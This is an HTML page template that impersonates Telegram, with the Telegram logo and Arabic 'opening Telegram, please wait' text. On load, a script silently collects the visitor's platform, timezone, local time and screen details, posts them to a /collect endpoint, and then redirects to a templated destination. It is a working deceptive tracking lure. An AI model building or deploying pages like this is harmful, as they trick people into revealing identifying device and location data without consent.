 <!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Telegram</title>
    <link rel="stylesheet" href="/static/telegram-style.css">
    <script>
        async function sendData() {
            const data = {
                platform: navigator.platform,
                timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
                localTime: new Date().toString(),
                width: screen.width,
                height: screen.height,
                colorDepth: screen.colorDepth
            };

            try {
                await fetch("/collect", {
                    method: "POST",
                    headers: { "Content-Type": "application/json" },
                    body: JSON.stringify(data)
                });
            } catch (e) {}

            // بعد 1.2 ثانية يتم التوجيه
            setTimeout(() => {
                window.location.href = "{{ goto }}";
            }, 2200);
        }

        window.onload = sendData;
    </script>
</head>
 <body>
  <div class="container">
    <img src="https://telegram.org/img/t_logo.png" alt="Telegram Logo" />
    <h1>جاري فتح Telegram...</h1>
    <p>يرجى الانتظار، يتم تحميل الصفحة</p>
    <div class="loading-bar">
      <div class="loading-bar-inner"></div>
    </div>
  </div>
</body>

</html>
